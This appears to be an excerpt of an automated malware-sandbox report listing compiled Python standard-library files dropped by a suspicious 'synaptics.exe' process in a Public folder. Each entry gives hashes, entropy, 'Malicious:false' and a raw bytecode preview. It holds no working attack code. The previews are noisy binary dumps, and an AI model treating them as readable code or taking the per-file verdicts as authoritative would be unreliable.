                                                                                                                                                                                      Preview:o........'-dh`.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d...Z.e.d...Z.e...d.e.j.e.j.B...Z.e...d...Z.e...d...Z.e.j.j.Z.d.d...Z.....d.d.d...Z.G.d.d...d...Z.G.d.d...d...Z G.d.d...d.e!..Z"d.S.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?= # literal ?=. z.[\041-\176]+:$z.\n[^ \t]+:c....................C...s....t.|.d...r.d.d...|.j.D...S.t...|...s.|.d.f.g.S.g.}.|.....D.]A}.t...|...}.d.}.|.r^|...d...}.|.r5|.....}.d.}.|.r?|...|.d.d.f.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1981
                                                                                                                                                                                      Entropy (8bit):5.343523285784554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:mhA49ILWjxxOzvfOoUFQLfMbhoJ9t1eYG1lGLG+hEl9:mrIWdU5UFsMbhOQGTEl9
                                                                                                                                                                                      MD5:5B6D159B4D5B211985B554E7F49C3E03
                                                                                                                                                                                      SHA1:F1FBB68FD429B834F4CE7C9519F6E0C821986273
                                                                                                                                                                                      SHA-256:C7117D12683EB6CEC1A0CE551F009A2AC3DAF9031223E143E78510A3FCABCB76
                                                                                                                                                                                      SHA-512:5D7E7782DF18EB472B294BF4208FDE5678621A37EA03090EC3D83C833D5C1AA5745C4CCAD77DC02DD43F63CA1EFFBD6C32883F77D918AF69E5CCF96A99F2F96D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sJ...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc....................c...s4.....|.V...|.....r.|.....D.].}.|.....E.d.H...q.d.S.d.S.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subpart..r.....3C:\Users\Public\QExvbmVOb25l\lib\email\iterators.pyr........s..................r....Fc....................c...s8.....|.....D.].}.|.j.|.d...}.t.|.t...r.t.|...E.d.H...q.d.S.).z.Iterate over the parts, returning string payloads line-by-line... Optional decode (default False) is passed through to .get_payload().. )...decodeN).r....r......isinstance..strr....)...msgr....r......payloadr....r....r....r...."...s..................r......textc....................c...s:....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37817
                                                                                                                                                                                      Entropy (8bit):5.296589999681023
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:43vKre029TBAXUyI2U7AqvYEO9cI9oyCoie5loDEL:SvN029TSUr2cAqJOyI9o7oiUL
                                                                                                                                                                                      MD5:2EDE936427F160B36B1277C422FCD0FA
                                                                                                                                                                                      SHA1:3B4D6A54D4FA37BF2C08A687660B0FD740B5772C
                                                                                                                                                                                      SHA-256:D3D2F278FA90533572E27FFFE669B6834D0ADE622C5CEDF202AB018AEDDEBE44
                                                                                                                                                                                      SHA-512:7F4DFB67F0EFAA7CAF9C645F382A1E2A7F8FD12C5AD683A0747D0EC6826377A8D374A0E351785AC51E3DDE39E2B7678B9DBC925ED76BCFA4CFDA2778CF04D10B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-di........................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.e...d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...Policy..compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c....................C...s4...t.|.....d...\.}.}.}.|.s.|.....d.f.S.|.....|.....f.S.).N..;)...str..partition..strip)...param..a..sep..b..r.....1C:\Users\Public\QExvbmVOb25l\lib\email\message.py.._splitparam....s............r....Tc....................C...s....|.d.u.r^t.|...d.k.r^t.|.t...r&|.d.7.}.t...|.d...|.d...|.d.....}.d.|.|.f...S.z.|...d.....W.n...t.yG......|.d.7.}.t...|.d.d...}.d.|.|.f.....Y.S.w.|.sOt...|...rXd.|.t...|...f...S.d.|.|.f...S.|.S.).a~...Convenience function to format and return a key=value pair... This will q
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5686
                                                                                                                                                                                      Entropy (8bit):4.923398082357042
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:l/3XAtZ7ue6RPlVEnTSi7sebc9++etT2FZXUVt3NzMb:pgtZ7+RPETSi7sebc9M2LXUVt3NzMb
                                                                                                                                                                                      MD5:1245201936FED02A9D5A0F0DA228CC55
                                                                                                                                                                                      SHA1:F5B9A993FA8ADEA6A46389AB224C9A58C9BC003A
                                                                                                                                                                                      SHA-256:7B4CF52EBF99D11D2B299BBD18C13F3A45C522882C46D5BEE38C45B30C180731
                                                                                                                                                                                      SHA-512:5714DD9D19AEB18787D62C2FF067F5DE8FBF1CD8116282E9E793299E6A560B935C3E1F62D1709ED7C1568D1A5AD8ECF400C07EF3464B0F0BE7D721266CC98718
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d4........................@...sx...d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c....................@...s0...e.Z.d.Z.d.e.d...d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....N....policyc....................C...s....|.|._.|.|._.d.S.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string or by a. blank
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7636
                                                                                                                                                                                      Entropy (8bit):5.505282413709055
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:eLJLyjCY2rlgeRk/SE34iIf3HOxK4RVZtp9s7tOcQekFUyq2n1/nGYu9ewBAd7zD:yJYUGQ2SEY27RlpXyyFhnGYQewBk8j4B
                                                                                                                                                                                      MD5:C658F69188E86C909F2C88BF90A221D1
                                                                                                                                                                                      SHA1:EEF818CBA986992E7AE1D7FF8031405E3ACD3E4C
                                                                                                                                                                                      SHA-256:DF43C0D69F622A97DC1649DC2A5227CBCECDCF1259E6512073E3CA18F8EC3965
                                                                                                                                                                                      SHA-512:BEB095E1691C539C49DAC5305D826320B30EBD2C24833051BADD6E0960DBEC0C59BDC340DADE986A42D1F2B75FAC2D365E4B33FAD321B21AAD1DF4A3162821D8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.'.......................@...sF...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.d...e.d...D...Z.e.d.d.....Z.e.d.d.....Z.d.e...d.....e...d.....D.].Z.e.e...e.e.<.q;d.e.e.d...<.d.D.].Z.e.e...e.e.<.qLd.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d.d...Z.d.d...Z.d,d.d ..Z.e.d.d.....Z.d!D.].Z.e.e...e.e.<.q.d"e.f.d#d$..Z.e.f.d%d&..Z.e.Z.e.Z.d'd(..Z.d)d*..Z d.S.)-aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime module for that instead...This module provides an interface to encode and decode both headers and bodies.with quoted-p
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9699
                                                                                                                                                                                      Entropy (8bit):5.5284917904338355
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:6bd4YopYU1b0vS5Tc8PNMw1TBrUEPUcXDu4cleZkcLPcCSStw3TG/3Wib/9:vpyv+FSwNBrUmbXDu4zRPiGyGF/9
                                                                                                                                                                                      MD5:03B0731DBA60974F2C20B0A387FD5212
                                                                                                                                                                                      SHA1:BDFCBF0E191F2AEDCAC053F0EACCF5EE0AC90CC0
                                                                                                                                                                                      SHA-256:6B346A9FDEBB592D85BFC55F88D701F614C3263BD3E28F9D7591F886B2D611C0
                                                                                                                                                                                      SHA-512:FC40AFB630F20FB4627D3E89AF2D7DBBBD321156FA09E284E2CDF42AFD6A78D05972962E3CC6AA9B665C131AED5821ABC3238E924EA55505068B92785049F3A6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.5.......................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.e...d...Z.e...d...Z.d.d...Z.d.d...Z.d5d.d...Z.d.d...Z.d.d...Z d6d.d...Z!d7d.d...Z"d8d.d ..Z#d!d"..Z$d#d$..Z%d%d&..Z&d'd(..Z'd8d)d*..Z(e...d+e.j)..Z*d,d-..Z+.../d9d0d1..Z,d:d3d4..Z-d.S.);z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c....................C...s$...z.|.......W.d.S...t.y.......Y.d.S.w.).z8Return True if s contains surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s..r...../C:\Users\Public\QExvbmVOb25l\lib\email\utils.py.._has_surrogates3...s.............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3888
                                                                                                                                                                                      Entropy (8bit):5.534506190864174
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:wXLHIYGspF3e06Q0YhQWUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:wXEYLpFkYdU7XYLf5c6+X1Y
                                                                                                                                                                                      MD5:1A186BC10C01FAF6825CA07A96E3E7A7
                                                                                                                                                                                      SHA1:3E81CDAEB81858414AE4AFAC4387F7721E1B2D1C
                                                                                                                                                                                      SHA-256:36C384913E1E09897391ED541A899625F7B4951FC90513D97C2F5AA329157616
                                                                                                                                                                                      SHA-512:E5809F9B2FA4E840ABE1DB325DBC9BB4FC44EA35545B500BD07FB1C76AF7AFA9526DB4293700BB30D9C03DA2BCA64589A3B5346ABCBBE25CD8883243A41BB3E2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10934
                                                                                                                                                                                      Entropy (8bit):5.843026063729711
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:wX2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1iMzxOkq4bpehh3qkyR0N:wXG0bueBI6Kzx9IX6Ri
                                                                                                                                                                                      MD5:5E0E02E233EA63060C8FE1A49C31631A
                                                                                                                                                                                      SHA1:C42CBFA519A9972D9B6BD55E619A2CB5FFF52F39
                                                                                                                                                                                      SHA-256:28A7A2B8753AD080BDFE42B3E8189D2B82C76FCE9A4340D7B5C416DD1EFF4A1A
                                                                                                                                                                                      SHA-512:612586779C1F26D357CBB954A3E6DB042C0AD9B30BCD1ECAED5BC19C99F6EBAD5FB7552D7DDE62B4F847DFDF716D55E767625DCE5D337F261AB8333163AB75A1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2390
                                                                                                                                                                                      Entropy (8bit):5.439156864509416
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:G8HYqr1E/GxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:G8HY0E/WtZjr+Jldf33Pf396nz
                                                                                                                                                                                      MD5:22050533B9C41ED4D89831676F2650B0
                                                                                                                                                                                      SHA1:FDD04FB38CFAED5D7C03D9AC7C2B6F79270F0971
                                                                                                                                                                                      SHA-256:F9A78908C2C8F0EB0A4DC9803302B1E5E788DDD2EC0B0E57DC6D17AD395CEF1A
                                                                                                                                                                                      SHA-512:45F944503B62ED9F2E7EB336F7079705A4D74894786F4C247D8E8FB12D38CCA2E7F4643AEA513A6BB15B6DEE2FDFC80EE8D3DD9CE936BE2686888EBA841341F2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....4C:\Users\Public\QExvbmVOb25l\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r......finalr....r...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5612
                                                                                                                                                                                      Entropy (8bit):5.23209220359469
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:iD57oZ0Mq9d9y50Om16wQNWLT1arA5fCAFK5n4NcJwp7ogXdB:yFoZ0n9d92Dm1rQNWL8s5aZocJwpJNB
                                                                                                                                                                                      MD5:E58F35B31D091F164FC43E8A0590E147
                                                                                                                                                                                      SHA1:BC2C92C56EF3D67A6EC75329908E0D44D5025CBF
                                                                                                                                                                                      SHA-256:E9A7E5E7DB2B77BFABCA02E91B27680E8AB036E43F5E4532C52FDA57BEF3A9F2
                                                                                                                                                                                      SHA-512:77060C717206932FCA3B6C65DCA0EBD55E96E21FD73DFD7F1EFABB9CDC27E3CB45E08A9264250D049B1783B59F7A382CF50A5B9B07D0C3EC4D480C54FA47E456
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.$.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.S.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c....................C...s....g.}.|.D.].}.t...|...r.q.|...t...|.......q.d...|...}.t...d.|...}.|.D.]5}.t...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...rWt.d.|.......q"d.d...|.D...}.t.|...r|t.d.d...|.D.....rpt.d.....|.d...rx|.d...s|t.d.....|.S.).N....NFKCz.Invalid character %rc....................S...s....g.|.].}.t...|.....q.S...)...stringprepZ.in_table_d1.....0..xr....r.....2C:\Users\Public\QExvbmVOb25l\lib\encodings\idna.py..<listcomp>)...s......z.nameprep.<locals>.<listcomp>c....................s...s......|.].}.t...|...V...q.d.S.).N).r....Z.in_table_d2r....r....r....r......<genexpr>1...s........z.nameprep.<locals>.<genexpr>z.Violation of BIDI requirement 2r.........z.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1610
                                                                                                                                                                                      Entropy (8bit):4.728935998507901
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ZVtus1pipMHUrYPyaGcLXaLOsJkLBBn1U:ZbuWNHUPNcLXaasmP1U
                                                                                                                                                                                      MD5:990F153518B6D6BDF0A0AE65C50B7941
                                                                                                                                                                                      SHA1:E228547F05E8315281C4210E4A4A033393DF265B
                                                                                                                                                                                      SHA-256:51A265B412E42E30C7ABBAE878E567275610553B2FDD19705D709F86263760DA
                                                                                                                                                                                      SHA-512:B2CF8CA74F847624EAED77C4419E63FB6529AA3F3BFA05937CE0E1205F55821AD16473684488FE70B87ABF2BBD5DC7C53DF7ACB9463EB73975468A78F0CB88E7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....3C:\Users\Public\QExvbmVOb25l\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c....................@...r....)...Str
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6429
                                                                                                                                                                                      Entropy (8bit):5.803869223949154
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:PWZsdAR4kaBaNzpZOZBDcxHN/8O2OHb4k7:P6zpZOZBDcpNp2iT
                                                                                                                                                                                      MD5:586EC357280D9B2CA86F69BB80E2FD5E
                                                                                                                                                                                      SHA1:26AB9E4178641B100CE7AE624C5D9E549B217603
                                                                                                                                                                                      SHA-256:28069D9FE48F2786B99B404CF0A163A252CD87FE6EA554072F7E4D15A7712162
                                                                                                                                                                                      SHA-512:F1866F7E0205D50981AAD1CE2A6994119DD6E7958518CD664D007E9BD453EE11E59D88DA0F7955DBBD5602E35BB892B33DED2310836191072EE39B97C18067DC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...IntEnum..HTTPStatusc....................@...s....e.Z.d.Z.d.Z.dDd.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCS.)Er....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. * RFC 7238: Permanent Redirect. * RFC 2295: Transparent Content Negotiation in HTTP. * RFC 2774: An HTTP Extension Framework. * RFC 7725: An HTTP Status Code to Rep
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):35191
                                                                                                                                                                                      Entropy (8bit):5.379843073709396
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:poG3ivqgYyeQcyEqVHpu/TTaC5TCW9ObjcDds:iG3HgYyeQcyEqVHpETH5Tj9UjYC
                                                                                                                                                                                      MD5:EF5292200A1832D99E13A310D1195E00
                                                                                                                                                                                      SHA1:90257407964B7D68CF8A6A35C54493564324C529
                                                                                                                                                                                      SHA-256:0BF12E11CD0F2183FF38ED57C4703533A7F160E6D81A9C30028F4436DA80C77F
                                                                                                                                                                                      SHA-512:C2D8841F6BB8F17BA4730FB90DC303CBDA3013ED4885318F51A70373AFAC52BB4C1F1510787CD594CC4A4C1531EF37A6F37C62260C8D9A09D5C25D4DED46490D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sP...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.....e.j.j.....d.d...e.j.j.....D...Z.d.Z.d.Z.e...d...j.Z.e...d...j Z!e...d...Z"e...d...Z#h.d...Z$d?d.d...Z%G.d.d...d.e.j&j'..Z(d.d...Z)e(f.d.d...Z*G.d.d...d.e.j+..Z,G.d.d ..d ..Z-z.d.d.l.Z.W.n...e/y.......Y.n.w.G.d!d"..d"e-..Z0e..1d"....G.d#d$..d$e2..Z3G.d%d&..d&e3..Z4G.d'd(..d(e3..Z5G.d)d*..d*e3..Z6G.d+d,..d,e3..Z7G.d-d...d.e3..Z8G.d/d0..d0e3..Z9G.d1d2..d2e3..Z:G.d3d4..d4e:..Z;G.d5d6..d6e:..Z<G.d7d8..d8e:..Z=G.d9d:..d:e3..Z>G.d;d<..d<e3..Z?G.d=d>..d>e@e>..ZAe3ZBd.S.)@a....HTTP/1.1 client library..<intro stuff goes here>.<other stuff, too>..HTTPConnection goes through a number of "states", which define when a client.may legally make another request or fetch the response for a particular.request. This diagram details these state transitions:.. (null). |. | HTTPConnection(). v. Idle. |. | putr
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):53453
                                                                                                                                                                                      Entropy (8bit):5.564343561169894
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:6BX5TRGXx0wM1oyXc63+Rb+TXzpTrY/hgRkOfmXULJn0MFgddqRGfUehMJutkvPK:KAI1FXZ+R+ZyhXd6x8MMT
                                                                                                                                                                                      MD5:9E81CB93637CA078C9B5090E8B051358
                                                                                                                                                                                      SHA1:02580005C089ACAEABE364E3B6C36073059AF6A8
                                                                                                                                                                                      SHA-256:7AF976BB29C3713F9DF340D7F5710D4EEF1C30EF3B9E6E64D113C12F4A0F2A65
                                                                                                                                                                                      SHA-512:657FAF2A1121778BABD740F719D3C35B2F380AACEBBAC8F3A73AF4C457F4760286F7B8ED4900B64ECFCE22CFE574DEA4BEF35084231713BE4DA45C947F893EF6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
